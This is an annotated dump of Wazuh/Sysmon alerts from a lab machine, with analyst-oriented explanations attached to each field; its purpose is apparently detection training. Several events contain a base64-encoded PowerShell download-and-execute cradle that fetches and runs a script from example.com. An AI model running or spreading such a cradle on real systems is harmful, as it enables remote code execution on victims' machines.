rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534353.1790907 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:11.1567475Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285151 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:09.790
ProcessGuid: {94294ddc-bd8d-680a-990b-000000000e00}
ProcessId: 12064
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd8a-680a-970b-000000000e00}
ParentProcessId: 1816
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:09.790 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd8d-680a-990b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12064 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd8a-680a-970b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 1816 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 88 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534353.1798974 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:11.4716773Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285155 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:11.459
ProcessGuid: {94294ddc-bd8d-680a-990b-000000000e00}
ProcessId: 12064
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_k2zzxdgo.ova.ps1
CreationUtcTime: 2025-04-24 22:39:11.459
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:11.459 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd8d-680a-990b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12064 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_k2zzxdgo.ova.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:11.459 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 85 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high-value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534356.1801743 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:14.6764079Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285203 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:13.251
ProcessGuid: {94294ddc-bd91-680a-9c0b-000000000e00}
ProcessId: 11356
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd8d-680a-990b-000000000e00}
ParentProcessId: 12064
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:13.251 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd91-680a-9c0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11356 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd8d-680a-990b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 12064 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 89 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high-value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534357.1809814 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:14.8850196Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285208 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:14.876
ProcessGuid: {94294ddc-bd91-680a-9c0b-000000000e00}
ProcessId: 11356
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_npkr0h0g.e4e.ps1
CreationUtcTime: 2025-04-24 22:39:14.876
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:14.876 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd91-680a-9c0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11356 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_npkr0h0g.e4e.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:14.876 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 86 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high-value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534360.1812583 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:18.2193741Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285229 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:16.709
ProcessGuid: {94294ddc-bd94-680a-9f0b-000000000e00}
ProcessId: 9520
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd91-680a-9c0b-000000000e00}
ParentProcessId: 11356
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
